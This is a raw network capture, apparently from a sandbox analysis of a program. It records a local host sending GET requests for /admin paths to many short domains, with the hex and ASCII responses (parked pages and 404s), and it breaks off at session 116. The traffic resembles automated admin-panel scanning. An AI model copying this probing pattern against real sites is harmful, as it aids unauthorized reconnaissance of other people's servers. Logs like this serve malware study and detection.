106	192.168.2.4	60966	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:48 UTC	278	OUT	GET /admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:48 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:48 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:48 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	61360	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:48 UTC	277	OUT	GET /admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:48 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:49 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	61385	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	162	OUT	GET /admin HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:49 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:49 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	61366	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:49 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:49 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	61364	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:49 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:49 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	61361	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	161	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:49 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:49 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	62158	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	234	OUT	GET /admin HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.119.144.209; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	718	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:49 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:49 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	62157	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:49 UTC	232	OUT	GET /admin/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:49 UTC	716	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:49 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:49 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	62869	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:50 UTC	165	OUT	GET /admin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:50 UTC	221	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:50 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:50 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	63405	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:50 UTC	162	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:51 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:50 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:51 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	63782	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
